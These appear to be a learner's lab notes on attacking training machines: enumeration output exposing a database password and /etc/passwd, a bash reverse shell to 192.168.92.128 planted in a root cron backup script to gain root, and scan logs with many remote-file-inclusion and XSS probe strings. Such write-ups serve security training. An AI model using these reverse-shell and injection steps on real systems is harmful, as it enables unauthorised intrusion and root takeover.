drwxr-xr-x 3 root root 4.0K May 29 2021 .
drwxr-xr-x 3 root root 4.0K May 29 2021 ..
╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 grimmie administrator 220 May 29 2021 /home/grimmie/.bash_logout
-rw-r--r-- 1 root root 946 Oct 15 2020 /usr/share/phpmyadmin/vendor/pragmarx/google2fa/.scrutinizer.yml
-rw-r--r-- 1 root root 799 Oct 15 2020 /usr/share/phpmyadmin/vendor/twig/twig/.php_cs.dist
-rw-r--r-- 1 root root 224 Oct 15 2020 /usr/share/phpmyadmin/vendor/twig/twig/.editorconfig
-rw-r--r-- 1 root root 0 Nov 15 2018 /usr/share/dictionaries-common/site-elisp/.nosearch
-rw-r--r-- 1 root root 0 Jul 23 01:28 /run/network/.ifstate.lock
-rw------- 1 root root 0 May 29 2021 /etc/.pwd.lock
-rw-r--r-- 1 root root 220 Apr 18 2019 /etc/skel/.bash_logout
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
╔══════════╣ Searching passwords in history files
Binary file /usr/share/phpmyadmin/js/vendor/openlayers/theme/default/img/navigation_history.png matches
╔══════════╣ Searching passwords in config PHP files
/usr/share/phpmyadmin/config.inc.php:$cfg['Servers'][$i]['AllowNoPassword'] = false;
/usr/share/phpmyadmin/config.sample.inc.php:$cfg['Servers'][$i]['AllowNoPassword'] = false;
/usr/share/phpmyadmin/libraries/config.default.php:$cfg['Servers'][$i]['AllowNoPassword'] = false;
/usr/share/phpmyadmin/libraries/config.default.php:$cfg['ShowChgPassword'] = true;
/var/www/html/academy/admin/includes/config.php:$mysql_password = "My_V3ryS3cur3_P4ss";
/var/www/html/academy/includes/config.php:$mysql_password = "My_V3ryS3cur3_P4ss";
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/grub/i386-pc/legacy_password_test.mod
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-wall.path
/usr/lib/systemd/system/systemd-ask-password-wall.service
#)There are more creds/passwds files in the previous parent folder
/usr/lib/x86_64-linux-gnu/mariadb19/plugin/mysql_clear_password.so
/usr/lib/x86_64-linux-gnu/mariadb19/plugin/simple_password_check.so
/usr/share/man/man1/systemd-ask-password.1.gz
/usr/share/man/man1/systemd-tty-ask-password-agent.1.gz
/usr/share/man/man7/credentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/pam/common-password.md5sums
/usr/share/phpmyadmin/user_password.php
/var/cache/debconf/passwords.dat
/var/lib/pam/password
/var/www/html/academy/admin/change-password.php
/var/www/html/academy/change-password.php
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
╔══════════╣ Searching passwords inside logs (limit 70)
2021-05-29 17:00:10 install base-passwd:amd64 <none> 3.5.46
2021-05-29 17:00:10 status half-installed base-passwd:amd64 3.5.46
2021-05-29 17:00:11 configure base-passwd:amd64 3.5.46 3.5.46
2021-05-29 17:00:11 status half-configured base-passwd:amd64 3.5.46
2021-05-29 17:00:11 status installed base-passwd:amd64 3.5.46
2021-05-29 17:00:11 status unpacked base-passwd:amd64 3.5.46
2021-05-29 17:00:18 status half-configured base-passwd:amd64 3.5.46
2021-05-29 17:00:18 status half-installed base-passwd:amd64 3.5.46
2021-05-29 17:00:18 status unpacked base-passwd:amd64 3.5.46
2021-05-29 17:00:18 upgrade base-passwd:amd64 3.5.46 3.5.46
2021-05-29 17:00:21 install passwd:amd64 <none> 1:4.5-1.1
2021-05-29 17:00:21 status half-installed passwd:amd64 1:4.5-1.1
2021-05-29 17:00:21 status unpacked passwd:amd64 1:4.5-1.1
2021-05-29 17:00:24 configure base-passwd:amd64 3.5.46 <none>
2021-05-29 17:00:24 status half-configured base-passwd:amd64 3.5.46
2021-05-29 17:00:24 status installed base-passwd:amd64 3.5.46
2021-05-29 17:00:24 status unpacked base-passwd:amd64 3.5.46
2021-05-29 17:00:25 configure passwd:amd64 1:4.5-1.1 <none>
2021-05-29 17:00:25 status half-configured passwd:amd64 1:4.5-1.1
2021-05-29 17:00:25 status installed passwd:amd64 1:4.5-1.1
2021-05-29 17:00:25 status unpacked passwd:amd64 1:4.5-1.1
Description: Set up users and passwords
╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r'
Notes
-rwxr-xr-- 1 grimmie administrator 112 May 30 2021 /home/grimmie/backup.sh
/var/www/html/academy/admin/includes/config.php:$mysql_password = "My_V3ryS3cur3_P4ss";
cat /home/grimmie/backup.sh
#!/bin/bash
rm /tmp/backup.zip
zip -r /tmp/backup.zip /var/www/html/academy/includes
chmod 700 /tmp/backup.zip
cat /var/www/html/academy/includes/config.php
<?php
$mysql_hostname = "localhost";
$mysql_user = "grimmie";
$mysql_password = "My_V3ryS3cur3_P4ss";
$mysql_database = "onlinecourse";
$bd = mysqli_connect($mysql_hostname, $mysql_user, $mysql_password, $mysql_database) or die("Could not connect database");
?>
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
grimmie:x:1000:1000:administrator,,,:/home/grimmie:/bin/bash
- open a new terminal tab, connect to
ssh [email protected] - download linpeas again and check if something has changed
- cd
/home/grimmie, we seebackup.sh
cat /home/grimmie/backup.sh
#!/bin/bash
rm /tmp/backup.zip
zip -r /tmp/backup.zip /var/www/html/academy/includes
chmod 700 /tmp/backup.zip
- Periodic backup, no cron info when doing
crontab -lor doingsystemctl list-timers - https://github.com/DominicBreuker/pspy, download the 64 bit static version, go back to tmp and wget the file
- we can see all the processes, we see backup.sh, it's running every minute.
- https://github.com/cwinfosec/pentestmonkey/blob/master/Reverse_Shell_Cheat_Sheet.md,
bash -i >& /dev/tcp/192.168.92.128/8081 0>&1, opennc -nvlp 8081 nano /home/grimmie/backup.shand copybash -i >& /dev/tcp/192.168.92.128/8081 0>&1
bash-5.0# whoami
root
bash-5.0# ls
backup.sh backup.sh.save
bash-5.0# cd /root
bash-5.0# ls
flag.txt
bash-5.0# cat flag.txt
Congratz you rooted this box !
Looks like this CMS isn't so secure...
I hope you enjoyed it.
If you had any issue please let us know in the course discord.
Happy hacking !
1 gb memory is enough, NAT for network.
- root:tcm to login
dhclient, thenip a
nmap -T4 -p- -A 192.168.92.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-24 01:45 EDT
Nmap scan report for 192.168.92.132
Host is up (0.00081s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 bd:96:ec:08:2f:b1:ea:06:ca:fc:46:8a:7e:8a:e3:55 (RSA)
| 256 56:32:3b:9f:48:2d:e0:7e:1b:df:20:f8:03:60:56:5e (ECDSA)
|_ 256 95:dd:20:ee:6f:01:b6:e1:43:2e:3c:f4:38:03:5b:36 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Bolt - Installation error
|_http-server-header: Apache/2.4.38 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 34727/tcp mountd
| 100005 1,2,3 36963/tcp6 mountd
| 100005 1,2,3 57403/udp6 mountd
| 100005 1,2,3 57496/udp mountd
| 100021 1,3,4 33795/tcp6 nlockmgr
| 100021 1,3,4 35248/udp6 nlockmgr
| 100021 1,3,4 37691/tcp nlockmgr
| 100021 1,3,4 49804/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs 3-4 (RPC #100003)
8080/tcp open http Apache httpd 2.4.38 ((Debian))
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: PHP 7.3.27-1~deb10u1 - phpinfo()
34727/tcp open mountd 1-3 (RPC #100005)
37691/tcp open nlockmgr 1-4 (RPC #100021)
38093/tcp open mountd 1-3 (RPC #100005)
42299/tcp open mountd 1-3 (RPC #100005)
MAC Address: 00:0C:29:B6:36:DD (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.81 ms 192.168.92.132
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.79 seconds
Notes
80 - info disclosure - installation error bolt
404 - info disclosure - Apache/2.4.38 (Debian)
app/nut - Symfony, wrong php version
README.md - Bolt Installer for Composer
composer.json - Bolt 3.7, passwordlib
Bolt CMS 3.7.0 - Authenticated Remote Code Execution
msf > use exploit/unix/webapp/bolt_authenticated_rce
BoltWire 6.03 - Local File Inclusion
8080 - info disclosure - PHP Version 7.3.27-1~deb10u1 - Linux dev 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
8080/dev/ - website with default boltwire page
nikto -h http://192.168.92.132
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.92.132
+ Target Hostname: 192.168.92.132
+ Target Port: 80
+ Start Time: 2024-07-24 01:58:01 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /app/: Directory indexing found.
+ /app/: This might be interesting.
+ /public/: Uncommon header 'x-debug-token' found, with contents: 73d5d0.
+ /src/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /composer.json: PHP Composer configuration file reveals configuration information. See: https://getcomposer.org/
+ /composer.lock: PHP Composer configuration file reveals configuration information. See: https://getcomposer.org/
+ /.gitignore: .gitignore file found. It is possible to grasp the directory structure.
+ /README.md: Readme Found.
+ 8102 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2024-07-24 01:58:23 (GMT-4) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.92.132/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.92.132/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
# Priority ordered case sensative list, where entries were found [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 23ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 27ms]
# Copyright 2007 James Fisher [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 27ms]
# [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 4ms]
# [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 35ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 30ms]
public [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 2ms]
# [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 344ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 357ms]
# [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 366ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 374ms]
# directory-list-2.3-medium.txt [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 390ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 631ms]
[Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 638ms]
# on atleast 2 different hosts [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 706ms]
src [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 1ms]
app [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 17ms]
vendor [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 2ms]
extensions [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 2ms]
[Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 791ms]
server-status [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 4ms]
:: Progress: [220560/220560] :: Job [1/1] :: 1724 req/sec :: Duration: [0:00:34] :: Errors: 0 ::
nikto -h http://192.168.92.132:8080
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.92.132
+ Target Hostname: 192.168.92.132
+ Target Port: 8080
+ Start Time: 2024-07-24 01:59:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Output from the phpinfo() function was found.
+ /index.php: Output from the phpinfo() function was found.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017
+ /./: Output from the phpinfo() function was found.
+ /index.php/123: Output from the phpinfo() function was found.
+ //: Output from the phpinfo() function was found.
+ /%2e/: Output from the phpinfo() function was found.
+ /index.php/\"><script><script>alert(document.cookie)</script><: Output from the phpinfo() function was found.
+ /index.php/content/search/: Output from the phpinfo() function was found.
+ /index.php/content/advancedsearch/: Output from the phpinfo() function was found.
+ ///: Output from the phpinfo() function was found.
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /dev/: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /index.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Output from the phpinfo() function was found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /?_CONFIG[files][functions_page]=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /?npage=-1&content_dir=http://blog.cirt.net/rfiinc.txt%00&cmd=ls: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /?npage=1&content_dir=http://blog.cirt.net/rfiinc.txt%00&cmd=ls: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /?show=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?1=lol&PAGES[lol]=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?AML_opensite=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?AMV_openconfig=1&AMV_serverpath=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?CONFIG[MWCHAT_Libs]=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?ConfigDir=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?DIR_PLUGINS=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?G_JGALL[inc_path]=http://blog.cirt.net/rfiinc.txt%00: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?HomeDir=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?Lang=AR&Page=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?Madoa=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?RP_PATH=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?abg_path=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?abs_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?abs_path=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?adduser=true&lang=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?adodb=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?ads_file=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?arquivo=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?back=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?base==http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?basePath=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?bibtexrootrel=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?blog_dc_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?blog_theme=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?body=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?class_path=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?classified_path=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?cms=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?config[\"sipssys\"]=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?config[root_ordner]=http://blog.cirt.net/rfiinc.txt?&cmd=id: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?config[root_ordner]=http://blog.cirt.net/rfiinc.txt?cmd=id: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?config_atkroot=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?configuration=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?custom_admin_path=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?dateiPfad=http://blog.cirt.net/rfiinc.txt?&cmd=ls: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?de=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?dept=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?do=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?exec=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?ext=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?faq_path=http://blog.cirt.net/rfiinc.txt?&cmd=id: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?file_name[]=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?file_Nikto[]=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?file_path=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?fileloc=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?from=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?func=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?function=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?function=custom&custom=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?gOo=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?gen=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?get=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?home_name=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?home_Nikto=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?ilang=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?inc_dir=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?inc_dir=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?includeDir=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?includeFooter=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
